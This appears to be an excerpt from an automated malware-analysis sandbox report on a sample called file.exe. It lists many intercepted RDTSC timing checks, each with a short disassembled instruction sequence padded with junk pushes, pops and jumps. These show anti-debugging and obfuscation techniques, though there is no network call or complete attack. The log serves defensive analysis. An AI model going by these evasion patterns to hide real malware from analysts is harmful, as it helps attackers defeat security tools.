Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7942B5 second address: 7942DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F701CDA8A75h 0x0000000e jbe 00007F701CDA8A66h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7942DA second address: 7942E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7942E1 second address: 794356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F701CDA8A68h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F701CDA8A70h 0x00000027 lea eax, dword ptr [ebp+1248605Bh] 0x0000002d jmp 00007F701CDA8A77h 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007F701CDA8A76h 0x00000039 push eax 0x0000003a push edx 0x0000003b jnl 00007F701CDA8A66h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794356 second address: 770A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jng 00007F701CDC8378h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 nop 0x00000016 or dword ptr [ebp+122D2E99h], eax 0x0000001c call dword ptr [ebp+12461050h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F701CDC8380h 0x00000029 jmp 00007F701CDC8388h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7947FA second address: 794800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794A12 second address: 794A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794A16 second address: 794A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A78h 0x0000000b popad 0x0000000c xor dword ptr [esp], 14CC710Ah 0x00000013 jmp 00007F701CDA8A6Eh 0x00000018 call 00007F701CDA8A69h 0x0000001d jo 00007F701CDA8A74h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794A5C second address: 794A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F701CDC8376h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F701CDC83A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDC8388h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794A88 second address: 794AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e js 00007F701CDA8A6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794AAE second address: 794AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jl 00007F701CDC8376h 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794AC3 second address: 794ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A77h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794BE4 second address: 794C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jc 00007F701CDC8388h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794C00 second address: 794C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794D5F second address: 794D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794D63 second address: 794D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794D69 second address: 794D91 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F701CDC8376h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F701CDC8378h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F701CDC8380h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79546F second address: 79547D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A6Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7958A7 second address: 79592B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F701CDC8378h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+124594D3h], ebx 0x0000002a mov edx, dword ptr [ebp+122D2BB3h] 0x00000030 lea eax, dword ptr [ebp+1248605Bh] 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F701CDC8378h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov edx, dword ptr [ebp+122D192Bh] 0x00000056 nop 0x00000057 jmp 00007F701CDC8381h 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 79592B second address: 79592F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750E7D second address: 750E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750E84 second address: 750E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750E8A second address: 750E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F701CDC8376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750E94 second address: 750E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750E98 second address: 750EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F701CDC8376h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 750EAC second address: 750EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C3AFE second address: 7C3B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F701CDC837Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C3B0E second address: 7C3B18 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F701CDA8A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CD701 second address: 7CD71A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F701CDC8376h 0x00000009 jmp 00007F701CDC837Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CD71A second address: 7CD72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F701CDA8A66h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD72B second address: 7CD72F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDB18 second address: 7CDB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jp 00007F701CDA8A66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDF5A second address: 7CDF70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F701CDC8378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d je 00007F701CDC8376h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE22E second address: 7CE232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE232 second address: 7CE242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE242 second address: 7CE24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE39F second address: 7CE3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE4EF second address: 7CE4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE4F4 second address: 7CE4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE681 second address: 7CE6A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F701CDA8A78h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB10 second address: 7CEB34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b ja 00007F701CDC839Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F701CDC8376h 0x00000019 jmp 00007F701CDC837Bh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3EC second address: 7CD3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4D44 second address: 7D4D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8381h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4099 second address: 7D409D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D409D second address: 7D40A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3840 second address: 7D3846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D44DE second address: 7D44F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F701CDC8381h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D44F6 second address: 7D44FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4637 second address: 7D4641 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E73 second address: 7D6E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E77 second address: 7D6E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E80 second address: 7D6E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6FEA second address: 7D6FFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F701CDC8376h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE7B2 second address: 7DE7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE925 second address: 7DE92F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F701CDC837Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE92F second address: 7DE93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F701CDA8A66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBE7 second address: 7DEBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF5 second address: 7DEBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF9 second address: 7DEC0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F701CDC837Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC0E second address: 7DEC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007F701CDA8A66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC1A second address: 7DEC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8386h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEDD second address: 7DEEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEE3 second address: 7DEEFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F701CDC8384h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF021 second address: 7DF025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF025 second address: 7DF02B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF02B second address: 7DF040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A71h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF040 second address: 7DF07A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F701CDC837Ah 0x00000013 jmp 00007F701CDC8388h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0A52 second address: 7E0A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0A68 second address: 7E0A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8388h 0x00000009 jmp 00007F701CDC8383h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DA1 second address: 7E3DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DA7 second address: 7E3DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DAD second address: 7E3DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F701CDA8A71h 0x0000000c push edi 0x0000000d jng 00007F701CDA8A66h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3694 second address: 7E36A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8381h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E381C second address: 7E384F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F701CDA8A66h 0x0000000f jc 00007F701CDA8A66h 0x00000015 jmp 00007F701CDA8A79h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E384F second address: 7E3853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B01 second address: 7E3B06 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5424 second address: 7E5429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9D57 second address: 7E9D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A77h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F67 second address: 7E9F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F73 second address: 7E9F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F77 second address: 7E9F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F701CDC8376h 0x00000010 jbe 00007F701CDC8376h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA273 second address: 7EA27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA27E second address: 7EA290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA290 second address: 7EA2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2A3 second address: 7EA2B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2B6 second address: 7EA2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2BF second address: 7EA2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA422 second address: 7EA445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F701CDA8A66h 0x0000000d jmp 00007F701CDA8A76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA445 second address: 7EA449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA449 second address: 7EA462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F701CDA8A6Eh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA462 second address: 7EA468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5A3 second address: 7EA5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5AD second address: 7EA5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F701CDC8376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB2EF second address: 7EB2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB2F3 second address: 7EB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F493F second address: 7F4944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4944 second address: 7F4966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8386h 0x00000009 jno 00007F701CDC8376h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
